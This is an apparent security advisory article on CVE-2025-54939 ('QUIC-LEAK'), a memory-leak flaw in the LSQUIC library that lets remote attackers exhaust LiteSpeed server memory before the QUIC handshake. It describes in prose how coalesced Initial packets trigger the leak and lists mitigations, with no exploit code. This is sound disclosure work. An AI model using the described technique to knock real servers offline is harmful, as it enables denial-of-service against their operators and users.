A significant security flaw, identified as CVE-2025-54939 and termed QUIC-LEAK, has been discovered in the LSQUIC QUIC implementation. This vulnerability enables remote attackers to exhaust server memory, leading to potential Denial-of-Service (DoS) attacks. Given that LSQUIC is the second most widely used QUIC implementation globally, this issue could affect over 34% of HTTP/3-enabled websites that utilize LiteSpeed technologies.
Understanding the QUIC-LEAK Vulnerability
The QUIC-LEAK vulnerability arises from a fundamental flaw in how LSQUIC processes coalesced packets within UDP datagrams before establishing connection handshakes. Attackers can exploit this by crafting malicious UDP datagrams containing multiple QUIC Initial packets. In these datagrams, only the first packet has a valid Destination Connection ID (DCID), while the subsequent packets contain invalid DCIDs.
Within the lsquic_engine.c file, the LSQUIC implementation identifies and disregards packets with mismatched DCIDs, adding their size to a garbage count to protect against amplification attacks. However, the critical flaw lies in the failure to properly deallocate the packet_in structures using the lsquic_mm_put_packet_in function, resulting in persistent memory leaks.
Each leaked packet_in structure consumes approximately 96 bytes of RAM. Given that a UDP datagram can carry up to 10 coalesced packets, attackers can induce memory growth at about 70% of their bandwidth rate. This attack circumvents standard QUIC connection-level protections, such as connection limits, stream controls, and flow regulation, as these safeguards only activate after the handshake process is complete.
Risk Factors and Impact
The QUIC-LEAK vulnerability poses several risks:
– Affected Products: The vulnerability impacts the LSQUIC library (versions prior to 4.3.1), OpenLiteSpeed (versions prior to 1.8.4), LiteSpeed Web Server (versions prior to 6.3.4), and any application utilizing the LiteSpeed QUIC library.
– Impact: Remote attackers can exploit this vulnerability to execute Denial-of-Service (DoS) attacks by exhausting server memory.
– Exploit Prerequisites: To exploit this vulnerability, an attacker needs network access to the target server and the ability to send UDP packets. Notably, no authentication or valid QUIC session is required, and the exploitation can occur before the handshake process.
– CVSS 3.1 Score: The vulnerability has been assigned a CVSS 3.1 base score of 7.5, indicating a high severity level.
Mitigation Strategies
Given the high severity of the QUIC-LEAK vulnerability, immediate action is essential:
– Upgrade Affected Software: Organizations should promptly upgrade to LSQUIC version 4.3.1 or later. This updated version is included in OpenLiteSpeed 1.8.4 and LiteSpeed Web Server 6.3.4.
– Implement Network-Level Protections: For organizations unable to upgrade immediately, it’s crucial to implement network-level UDP traffic filtering. This measure can help mitigate potential attacks by controlling the flow of UDP packets to the server.
– Enforce Memory Usage Limits: Setting strict memory usage limits on exposed services can prevent servers from becoming unresponsive due to memory exhaustion.
– Continuous Monitoring: Maintaining continuous monitoring for anomalous traffic patterns targeting QUIC endpoints can aid in the early detection and mitigation of potential attacks.
Conclusion
The discovery of the QUIC-LEAK vulnerability underscores the importance of proactive security measures in the rapidly evolving digital landscape. Organizations relying on LSQUIC and LiteSpeed technologies must prioritize addressing this vulnerability to safeguard their servers against potential Denial-of-Service attacks. By upgrading affected software, implementing network-level protections, enforcing memory usage limits, and maintaining continuous monitoring, organizations can enhance their resilience against such threats.
